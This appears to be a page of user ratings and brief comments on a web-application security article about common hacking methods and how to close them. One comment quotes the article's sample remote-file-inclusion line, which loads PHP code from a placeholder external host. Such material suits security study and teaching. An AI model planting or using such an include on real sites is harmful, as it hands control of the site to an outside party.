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From the page: "Top 5 Ways to Hack into Your Web Application (and how to close those security loopholes!)"
Reviewed by SuperFreak69 May 31, 10:42pm ( 10 reviews ) • inetu.net
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Rated by stevegparker on Jul 05, 5:11pm
From the page: ". All a hacker needs to do is find one file to manipulate and add the line: include(â€http://www.example.com/malicious_code.phpâ€) and you are compromised." If I can write to your DocumentRoot, I own your website. Whatever it uses - static HTML or anything else.
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Rated by Brukhar on Jun 22, 9:51pm
sure, he doesn't mention bind variables, but still, a decent read
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Rated by SuperFreak69 on May 31, 10:42pm
From the page: "Top 5 Ways to Hack into Your Web Application (and how to close those security loopholes!)"
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Rated by Akihama on May 31, 6:58pm
Top 5 ways to hack into any web application